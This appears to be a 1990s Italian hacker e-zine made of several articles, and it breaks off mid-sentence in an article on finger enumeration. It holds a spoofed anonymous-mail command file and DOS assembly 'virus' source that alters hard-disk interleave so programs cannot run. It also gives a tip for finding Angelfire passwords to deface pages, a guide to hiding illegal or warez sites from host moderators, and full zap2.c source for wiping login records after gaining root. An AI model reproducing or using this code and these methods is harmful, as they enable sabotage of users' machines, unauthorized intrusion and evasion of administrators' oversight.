un file di comandi potrebbe essere tipo questo
helo pippo.com
mail from:pippo@pippo.com
rcpt:email.lamer@internet.it
data
anonimo

.
quit

come avrete capito spero con questo file di comandi si possono mandare
mail anonime oppure per irc si potrebbe creare un file di comandi
per spooffarsi.
e' tutto buon ftpbounce.
Ghimlet

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ VIRUS X DOS 6.1 ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Allora il nostro mitico Vecna ci ha fatto avere un virus che non funzia sotto
win nt o 95 ma solo sotto DOS 6.1. Mostriamo qua questo virus fatto da Sorrow
solo x dare un esempio di come e' fatto un virus, e cmq sappiate che in questa
sede ci tengo a dichiarare che i virus writer NON SONO FALLITI ma sono non
buoni programmatori, ma ottimi programmatori, xche' solo cononoscendo bene un
linguaggio si riesce a tirarne fuori il meglio x i propri programmi...tutto
questo e' IMO e solo IMO dato che non so cosa ne pensino gli altri membri della
crew. Accludo le "istruzioni dettate da Sorrow "siccome la storia e' importante
l'ho messo in ordine in modo che venga compilato dal NASM ( nasm -f bin -o
Interleave.com ) e l'ho commentato un pochino...".
Quindi un grosso grazie a Vecna x averci procurato un altra chicca x la ezine
e a Sorrow x il materiale offertoci ^__^
Leggete, cercate di capire, che questo e' lo scopo x cui lo mettiamo sulla
ezine, e ricordate che...conoscenza e' potere!

N0bodY88
-----------------------------------------------------------------------------------
; Sorrow The Prince
; modify hd interleave for DOS 6.1
; use NASM to compile
; educational purpose only
; *** you has not the permission to modify the source ***

; IT mode ON =8)
; sfrutta il DRIVE PARAMETER BLOC, una delle strutture non documentate
; del DOS, nel quale vengono memorizzate diverse informazioni su disk
; drive, hard disk e Cd rom : insomma su tutti i device che abbiamo 8)
; ci sono deu funzioni per accedere ai vari DPB che sono 0x1F e 0x32
; entrambe ritornano in DS:BX un ptr al DPB
; 0x1F ritorna il DPB del disk drive corrente, mentre con al funzione
; 0x32 possiamo scegliere il device mettend in DL 0 (A), 1 (B), 2 (C)
; etc...
; ho commentato solo la parte "interessante" del programmino, il resto
; si limiuta a scrivere se abbiamo modificato o no l'interleave
; non funziona sotto Win95 e WinNT : la chiamata va a buon fine
; ma l'interleave non viene modificato

; NOTE FINALI il risultato e' molto carino a vedersi sotto DOS : tutti
; i comandi del command funzionano a dovere, ma non e' possibile
; lanciare alcun eseguibile perche' non viene letteralmente trovato
; carino, veloce e semplice!

BITS 16
ORG 0x100

SECTION .text

jmp main

main mov ah,32h ;numero fne in ah
mov dl,03h ;3 = drive C, l'HD -8)
int 21h
jc error ; se e' avvenuto errore scriviamo qlc
mov al,01h ; altrimenti settiamo a 1
mov [ds:bx+4],al ; l'interleave del disco fisso che di
mov ax,cs ; solito e' maggiore
mov ds,ax
jmp ok

error mov ax,cs
mov ds,ax
mov ax,0900h
lea dx,[msge]
int 21h
jmp fine

ok mov ax,cs
mov ds,ax
mov ax,0900h
lea dx,[msg]
int 21h

fine : mov ax,4C00h
int 21h

SECTION .data

msg db "Finishing... OK!$"
msge db "!!!ErroR!!!$"
_.._ _.._
,','"_:./\/\,'_ `.`. Sorrow The Prince
/_:--:_ ( oo ) _:--:_\ uin( ******** ) - GiR 239
/' `'`vv'`' `\ Member of cOc
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ QUALCHE INFO SU ANGELFIRE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Allora, di recente ho trovato un txt sull'hacking di Angelfire e, oltre
a sconsigliare il social engineering (funzionante soprattutto x geocities)
conteneva questa informazione.....

quando fai un login x modificare la pagina web vine aperto un file che si
chiama BEDIT.HTML
cosi' composto:

<font color=teal>Your page <a href="http://www.angelfire.com/ak2/r00t7/
index.html"> http://www.angelfire.com/mi/KrazieBread/index.html </a> has
been saved.<br>You may have to click Reload or Super-Reload (Shift+Reload)
to see your edited page and not your old version when you go to your URL.
<br>You can also announce your new page on <a href="http://homepages.
whowhere.com/bin/showpage.pl?add">WhoWhere?</a>, <a href="http://newtoo.
manifest.com/"><u>What's New Too!</u></a>, or if you really want to get
noticed, go to <a href="<u>Submit">http://www.submit-it.com/"><u>Submit It!</u></a>
<br>Tune up your Web Site at the <a href="http://www.angelfire.com/cgi-bin/
ct?ad=websitegarage&vp=/index.clicked&ru=http://www.websitegarage.com/
whowhere">Web Site Garage</a>.</font>

</td></tr></table></center>
<form select method="post" action="http://www.angelfire.com/cgi-bin/bedit">
<input type="hidden" name="storage" value="mi">
<input type="hidden" name="hpd" value="r00t">
<input type="hidden" name="password" value="r00t7"> <-------PASSWORD!!!

quindi se volete fare casino su una pagina di Angelfire cercate questo bel
file (il social engineering funziona sempre)

Byezzzzz SkHammer

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COME MANTENERE LA VOSTRA PAGINA "ILLEGALE" ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Created by: Biavo

INTRODUZIONE:

La cosa che si fa piu' spesso quando si naviga su Internet e' cercare un bel sito pieno di
consigli su azioni piu' o meno legali riguardanti l'hacking, il cracking, il phreaking e chi
piu' ne ha piu' ne metta. Ovviamente questi siti sono sempre ben nascosti e raramente si
trovano su server che forniscono spazio web gratuitamente come GeoCities, Tripod e
compagnia bella.
Infatti, questi server hanno una serie di rigide regole da rispettare se non si vuole
vedere il proprio sito cancellato, quindi sembrerebbe che per gli hacker privi di "mezzi"
non ci sia molto da fare per non parlare di coloro che vogliono aprire il loro sito di warez
o di crackz (dato l'esiguo spazio che questi server concedono sarebbe in ogni modo un'impresa
ardua!!!) e invece no!
Come avrete capito se tentate di mettere su il vostro sito "illegale" presso uno qualsiasi
di questi "benefattori", aspettatevi di vederlo cancellato nell'arco di poche settimane con
la scusa del "contenuto improprio".
Qualcuno, se non lo avete capito, sta cercando di limitare la vostra liberta' d'espressione,
e questa volta statene certi LUI NON LA FARA' FRANCA!!!

PRIMA DI PARTIRE:

Allora avete deciso di creare la vostra pagina con contenuto illegale? Benissimo, ne sono
felice, per prima cosa ricordatevi di procurarvi un account di posta elettronica diverso da
quello del vostro ISP, questo dovrebbe essere abbastanza semplice grazie ai vari Hotmail,
Netaddress, Juno, Mailexcite, Bigfoot e l'italianissimo Freemail.
Volendo potreste optare per un mail forwarder (ad es. Netforward), ossia un servizio che si
limita a rispedire la posta al vostro vero indirizzo di Email.
Io suggerisco di procurarvi un account che vi consenta di ricevere e spedire la posta
(magari tramite browser) ed evitare quindi un forward dato che si puo' facilmente risalire al
vostro vero ISP, inoltre scegliendo un account "completo" eviterete il rischio di Spam e
noiose pubblicita' che invadono la vostra casella postale.

Adesso siete pronti per crearvi l'account per le vostre pagine, come gia' detto GeoCities e
Tripod sono i principali fornitori di questo servizio ma non gli unici, ricordatevi di
consultare la lista "della spesa" alla fine di questo documento.

ISCRIZIONE:

Al momento dell'iscrizione per usufruire del servizio, vi saranno richiesti dei dati
anagrafici, NON usate mai i vostri veri dati!!! Inventatevi nomi e indirizzi falsi ma non
troppo, non bisogna mai creare sospetto. Se vi dovesse essere richiesto di inserire qualche
riga per descrivere il contenuto delle vostre pagine NON inserite parole come hacking o altre
che loro potrebbero trovare offensive verso i termini del contratto; piuttosto scrivete cose
come: "Mario Homepage" o simile.
Ricordatevi di fornire anche il vostro nuovo indirizzo Email che vi siete creati poco prima.

CREAZIONE DELLE PAGINE:

Dopo che vi siete iscritti, controllate la posta. Dovreste ricevere un messaggio di conferma
della vostra registrazione inoltre vi sara' ricordato il vostro login/password (mi raccomando
non perdeteli!!!). Ora siete pronti per collegarvi e lavorare sulla vostra homepage.

USATE PAGINE "FASULLE":

Questo e' il segreto per mantenere le vostre pagine in eterno (o quasi). Dovrete creare due
set di pagine!!! Perché due set di pagine? E' molto semplice. Dovete sapere che GeoCities
nomina dei moderatori (chiamati "block leaders") per visitare in modo casuale i siti
all'interno dello spazio a loro assegnato. La cosa piu' bella e' che questi moderatori non
hanno accesso alla vostra password o alla vostra directory di root percio' loro possono vedere
solo quello che VOI decidete di fargli vedere.
Ricordate nel contratto che avete accettato era presente una riga simile a questa:
"no hidden or password protected pages are permitted" ("non sono consentite pagine nascoste
o protette da password")? Bene, il motivo di questa limitazione sta proprio nel fatto che i
moderatori non riescono a controllare pagine che non siano raggiungibili tramite i link
presenti nell'Indice.
Quindi abbiamo bisogno di due set di pagine. Un set conterra' tutte le pagine "improprie"
mentre l'altro set conterra' delle stronzate sul vostro cane, la vostra famiglia e amenita' varie.
Ora per avere il secondo set di pagine (quelle fasulle) avete due opzioni, o le create voi
stessi o se siete pigri potete rubarle a qualcun altro. Se per esempio avete bisogno di un
falso set di pagine per Tripod, potete fare una ricerca (con HotBot) sulla stringa "personal
homepage". Sicuramente otterrete centinaia di link poiché al giorno d'oggi chiunque si crea
la propria homepage! Comunque scegliete la vostra "vittima" e copiategli la pagina, che
sia bella o brutta non importa, l'importante e' che abbia un contenuto insospettabile, qualche
immagine, un po' di testo e qualche link. Ora potete fare l'upload di queste pagine e usarle
come fossero le vostre. Ricordatevi di NON creare nessun link dalle vostre pagine fasulle alle
vostre pagine vere!!! Ricordatevi anche di modificare eventuali indirizzi Email o dati molto
personali presenti nelle pagine fasulle.

USATE UN "WEB PAGE FORWARD":

A questo punto che avete entrambi i set sul server dovete fare in modo che chi sia interessato
al vostro vero sito riesca a raggiungerlo. Per fare cio'

  
avete bisogno di un web page forwarding
ossia un servizio gratuito che molti siti forniscono che consiste in un breve URL che rinvia
l'utente ad una determinata pagina. Una volta trovato un forwarder di vostro gradimento,
v'iscriverete per fare in modo che l'utente digitando questo nuovo URL sia inviato nelle vostre
pagine "improprie" su GeoCities o Tripod. L'URL cosi' ottenuto sara' quello da distribuire
agli "amici".
Se non volete un account presso i Web page forwarding, potete farvi la vostra pagina di forward
da soli. Procuratevi una nuova pagina su GeoCities o su Tripod o dove diavolo volete e
settatela in modo che vi rinvii alle vostre vere pagine, di seguito trovate il codice HTML
per far cio':

<head>
<meta http-equiv="refresh" content="0; URL=http://mia.pagina">
</head>


Clicca qui per andare alle mie pagine:
http://mia.pagina/.

Dato che i browser piu' datati potrebbero non riconoscere il comando refresh assicuratevi di
aggiungere un link alle vostre vere pagine.

Io personalmente vi sconsiglio di crearvi il forward da soli ma di procurarvelo dato che in
quest'ultimo modo si hanno dei vantaggi notevoli:

1. Il vostro indirizzo di forward non cambiera' mai. Infatti anche se le vostre pagine fossero
cancellate o trasferite, il vostro indirizzo di forward rimarrebbe lo stesso e sarebbe molto
semplice "adattarlo" al nuovo collocamento delle vostre pagine.
2. L'indirizzo di forward e' solitamente piu' corto del vostro URL reale.
Esempio: http://www.geocities.com/SiliconValley/Foothills/5966/index.htm
(URL Reale)
http://come.to/MiaPagina
(URL di Forward)

CONSIGLI EXTRA PER LE DIRECTORY:

· Posizionate i vostri file "illegali" all'interno di directory con nomi innocenti. Esempio:
"storie", "grafica", "poesie", "antivirus", "amici", ecc. Siate creativi!!!
· Per meglio proteggere i file all'interno delle vostre directory, fate l'upload di una pagina
bianca o contenente la simpatica scritta: "404 File Not Found" e usatela come Indice.

LISTA DELLA SPESA:

Email gratuite:

· http://www.hotmail.com/
· http://www.mailexcite.com/
· http://www.netaddress.com/
· http://www.yahoo.com/
· http://www.freemail.it/

Email Forward gratuito:

· http://www.bigfoot.com/
· http://www.netforward.com/

Web Page Forward gratuito:

· http://come.to/
· http://rsl.net/

Spazio Web gratuito:

· http://www.angelfire.com/
· http://www.fortunecity.com/
· http://www.geocities.com/
· http://www.tripod.com/
· http://www.wbs.net/
· http://www.xoom.com/

CONCLUSIONI:

Spero che questa guida vi abbia ispirato e vi abbia fornito delle buone idee da mettere in
pratica.
Tuttavia non vi posso promettere che le vostre pagine rimarranno per sempre ma probabilmente
dureranno piu' di quanto sarebbe normalmente grazie a questi miei consigli.
Grazie per l'attenzione e divertitevi a mantenere le vostre pagine "illegali"!!!

Biavo

Per informazioni, complimenti, offese, scambio di foto porno :)
Biavo@freemail.it

PS: un ringraziamento particolare a Moh, il piu' grande programmatore che conosca (nonche' mio
spacciatore personale) che mi ha aiutato a creare questo articolo.

PSS: un salutone a ZeroCool (che ogni giorno mi stupisce con qualche interessante programmino)
e a Dark Schneider (che crede nella mia stessa religione, NESSUNA), i piu' interessanti tipi
che abbia conosciuto sulla rete.

PSSS: un grazie particolare a Tarsa, l'unica ragazza che conosca che oltre ad essere bella
e' anche intelligente.
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COME CAMBIARE ICONE CON REGEDIT ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Qui vi spiego un piccolo skerzetto che potete fare a vostri amici o magari
potete usare per personalizzare il vostro desktop.Se poi usate la stessa
tattica per lasciare traccia del vostro passaggio in un pc ,io non vi ho
detto nulla....
Allora , per prima cosa dovete creare dei files con estensione .ico , mi pare
quasi ovvio :-].
Per fare cio' usate Microangelo o similari , magari modificando le icone che
gia' sono installate nel vostro sistema.
Compiuto questo passo necessario dovete sapere una piccola cosa sulle icone:
sono contenute in files .exe ,.dll e .ico.
Per i files .exe e .dll c'e' da dire che le icone memorizzate sono numerate a
seconda dell'immagine , quindi se un .exe ha 50 icone , come si fa a sapere
quale delle 50 cambiare?
Per non farla troppo lunga , io consiglio di usare Icon Ripper 1.0.0.3 ,
scaricabile all'url http:www.worldcity.nl/~marcoko che e' in grado di esaminare
sia exe che dll e di salvare le icone nel formato standard. Tenete ben presente
che il numero di indice delle icone parte da Icon Ripper segna la prima icona
con il numero 1.State attenti , altrimenti sostituite l'icona sbagliata...
Uso anke Collect Icon 1.0 reperibile a http://www.hkstar.com/~myst che mi da
la possibilita' sia di fare una scansione del disco in cerca di icone , sia di
salvarle in bitmap.
Insomma, i motori di ricerca li sapete usare , io ho solo dato un piccolo
suggerimento , in modo da sapere quali files modificare :-]
Espresse le vostre capacita' artistiche potete adesso passare alla fase piu'
concettuale della vostra opera.
Create un files con estensione reg e scrivete le modifiche che desiderate
introdurre nel look delle vostre icone , in questo modo:

---------inizio files .reg------------
REGEDIT4
;RigoR MorteM
;Tabulato spiccio per la modifica delle icone
;rigormortem@mindless.com
;Club SpiPPoLaTorI 98-99

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Shell Icons]
"8"="C:\\directory delle icone\\nomeicona.ico"
"0"="C:\\directory delle icone\\nomeicona.ico"
@="C:\\directory delle icone\\nomeicona.ico"

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\DefaultIcon]
@="C:\\directory delle icone\\nomedll.dll,0"

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\DefaultIcon]
@="C:\\directory delle icone\\nomeicona.ico,0"

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\DefaultIcon]
@="C:\\directory delle icone\\nomeicona.ico,0"

---------fine files .reg------------

Spiegazioncina rapida .....
Il path fra parentesi quadre specifica su che porzione del registro andate a
lavorare , il numero fra virgolette specifica il numero dell'icona da
sostituire (in questo caso il numero 8 e' l'icona dell'hard disk) ed il path
dopo il segno di uguale e' riferito alla directory nella quale sono inserite
le icone e l'icona da usare in sostituzione.
Potete anche usare un files .dll dal quale estrarre le icone ma in questo
caso dovrete specificare anche il numero dell'icona da estrarre , cn il
solito metodo del numero...
Da notare che l'icona numero 0 puo' essere definita sia con "0" sia con @
(senza virgolette @ , mi raccomando).Se poi volete specificare tutti e 2 non
fa male...
Se poi l'icona e' l'unica contenuta nel files che volete modificare dovete
specificare sia @ che lo zero alla fine del nome dell'icona sostitutiva.
Qui sotto vi riporto parte dei files che contengono icone :

iosclass.dll : icona del lettore cd e di un hard disk
inetcpl.cpl : icone relative ad Internet Explorer 4.0
expolorer.exe : risorse del computer
shell32.dll : la maggior parte delle icone di windows
infrared.dll : icona delle porte a raggi infrarossi
mmci.dll : icona multimedia
modem.cpl : icona del modem , come dal nome :-]]]]
setupx.dll : tamburi , stampante , scheda scsi hard disk di rete...
msprint.dll : stampante di rete non connessa

Bene , mi pare di aver detto tutto , per adesso vi saluto !Ah, se volete
delle icone di teschi o simili , contattatemi , magari si fa a cambio , ok?
Per chiarimenti la mia mail e' rigormortem@mindless.com

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ USARE ZAP2 X RENDERSI INVISIBILE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

USARE Zap2 PER RENDERTI INVISIBILE

"Il mio nome e' Nessuno."

Bene guys, avete ottenuto il vostro primo (ma potrebbe pure essere il
200esimo..) accesso root su un bel sistema; ora siete felici ok, ma
cosa sono quelle facce? Cosa dite? Non avete nessuna voglia di farvi beccare
dal SysAdmin che vigile e attento come una fai'n che ha trasformato il suo
stupendo sistema in un campo minato da logz? Mi sembra piu' che giusto ragazzi.
Vediamo allora un programmino che, lanciato da root, cancellera' le vostre
tracce evidenti come una merda di vacca sul divano bianco della nonna, dai
filez: wtmp, utmp e lastlog.
Innanzi tutto voi avrete gia' precedentemente controllato l' esatta ubicazione
di questi filez nel sistema, perche' questo vi servira' per editare l'inizio
del programma inserendo il loro percorso giusto.
Solitamente si trovano in: /var/adm/wtmp
/var/adm/utmp
/var/adm/lastlog

E le righe del sorgente da editare sono: #define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/var/amd/lastlog"

Prima di fare girare il programma digitate W per vedere se c'e' qualcuno, poi
per eseguirlo digitate ./zap2 username (che chiaramente va sostituito con il
vostro username).

Scrivo ora il sorgente zap2.c
-----------------------------------TAGLIA-------------------------------------
here
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
-----------------------------------TAGLIA-------------------------------------

Bene, ora provate nuovamente a digitare w e magia! Voi non siete piu' su quel
sistema a quanto pare. ;-)
Ma ricordate: questo programma funzia solo per i suddetti logz; se dovete
infatti usare ftp dovrete poi preoccuparvi di editare wtmp e cancellare i
vostri logz ftp oppure usare un altro programma apposito. Anche i maillogs
sono "fuori giurisdizione" dello zap2. Percio' guys mi raccomando: prudenza
e pulizia soprattutto; sappiate sempre che se il sistema e' un minimo sicuro
e il SysAdmin non e' completamente idiota, potrebbero laggarvi addirittura
i tarzanelli del culo. ;-)

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ]Da RaG3[ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ FINGER ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

-----------------< fritz presents.... >-----------------

:finger

Ok..rieccomi con un altro articoletto per voi cicciolini miei ;-)
Questo e' nato perche' sono stato incaricato assieme ad altri di
scrivere qualcosa in generale su come nascondere la propria
identita' durante le piu' svariate peregrinazioni su internet, che
siano una passeggiata sul web, una chat tra amici o una hackerata
(o lamerata...;-) )
Allora, come primo argomento che propongo io vi offro come
trovare info col finger...
Ok, direte, che cazzo c'entra con l'anonimato?? No..dai..non
ditelo...non lo so bene neanch'io cosa c'entri, solo che mi e'
venuto in mente, lo spoofing era un topic gia' assegnato (per
fortuna :-)) e di shell parlero' dopo.
Ok allora posso iniziare.
Innanzitutto e' da dire cos'e' il finger, cosa mi rappresenta...
be'... e' un servizio disponibile su piattaforme *NIX nato con lo
scopo di fornire informazioni su un utente se ha un account presso
quel server.
Ci sono tuttavia in corso discussioni sul fatto che possa essere
legale o meno ottenere info in questo modo. Io credo proprio di
si, ma e' un IMO (senza honest :-) ). Infatti visitare un server
presso la porta 79 e' legale come visitarlo presso la 80, solo che
in quest'ultima si trova la pagina web, nella 79 il servizio
finger. Allora io dico: se con una semplice domanda ad un servizio
pubblico il server mi risponde con nome, cognome ed email di tutti
i suoi utenti, be', sono cazzi dell'amministratore che lascia di
pubblico dominio informazioni che potrebbero essere considerate
come riservate, non miei che le leggo che strumenti reperibili
presso qualsiasi sito di programmi shereware piu' che legali.
In ogni caso, come gia' detto, e' un IMO.
Allora, come si usa?
Per utenti *NIX e' facile, c'e' il comando fornito di serie, ma
per Windows?? (escluso NT che dovrebbe averlo) e per Mac e OS-2
bisogna trovarsi l'apposito programmino.
Ce ne sono tanti in giro, sia applicazioni che fanno solo finger,
sia applicazioni che offrono un'insieme di funzioni come ping,
host domain search ecc ecc...
Se ne siete sprovvisti, lasciatemi consigliare l'ottimo ws_ping
pro pack 2.x, consigliato dai livelli alti dell'hacking :-), l'URL
l'ho persa, ma se cercate con l'FTPSearch il file wsp_eval.exe lo
trovate subito, oppure Finger32, consigliato dallo staff di
TheArgon, reperibile presso

ftp://hyper.net.au/Win95nt-apps/Finger/Wsfinger/wsfngr32.zip .

Ecco, ora che vi siete muniti, nel caso improbabile che ne foste
sprovvisti, spiego meglio come si usa.
Allora, come gia' accennato, si possono ricavare info su un utente
connesso al server, vediamo assieme qualche esempio...
[premessa: sfortunatamente di server che offrono ancora il
servizio di finger ce ne sono pochi, gli amministratori tengono
sempre piu' alla privacy dei loro abbonati...-e sarebbe anche ora
:-) ]
Allora... troviamo un dominio su cui fare un paio di prove...
quello che ho trovato io (grazie Buttha!! :-) ) lo chiamero'
host.it, eheheh..W la fantasia..
Per prima cosa un finger generico, ovvero
-finger @host.it,
che dovrebbe ritornarmi la lista di tutti gli utenti connessi,
come infatti accade:

---<>---
Welcome to Host's finger demon

Searching for: ''

[codice1] [username1] <email1>
[codice2] [username2] <email2>
[codice3] [username3] <email3>

[... seguono altre 17 righe di questo tipo, che dopo lunghe
riflessioni ho deciso di censurare, lasciare cioe' [codice] ecc
invece del codice, della username e della email che ho ottenuto
col finger]


Only first 20 users listed, please be more selective
---<>---

eheheh... il demone del finger ci avvisa che la nostra richiesta
e' stata troppo generica, e quindi ci fa vedere solo i primi 20.
A questo punto, vogliamo sapere chi e' l'amministratore? Ok allora
si fa un
-finger root@host.it
che mi fornisce un output sempre dello stesso tipo:

---<>---
Welcome to Host's finger demon

Searching for: 'root'

[codice] [nome cognome] <email>
---<>---

:-)))

E via di seguito.
Ma tutto cio', direte voi, cosa ci interessa? ehmm... questo lo
ignoro anch'io, solo che ormai l'ho scritto :)
Cmq ricordatevi di una cosa: non so se avete mai visto una lista
di account su un server *NIX, non sono presenti solo persone
fisiche, come invece ci si aspetterebbe, con settati i loro
privilegi, ma anche una lista di programmi che per lavorare
correttamente necessitano anch'essi di vari privilegi. Quindi se
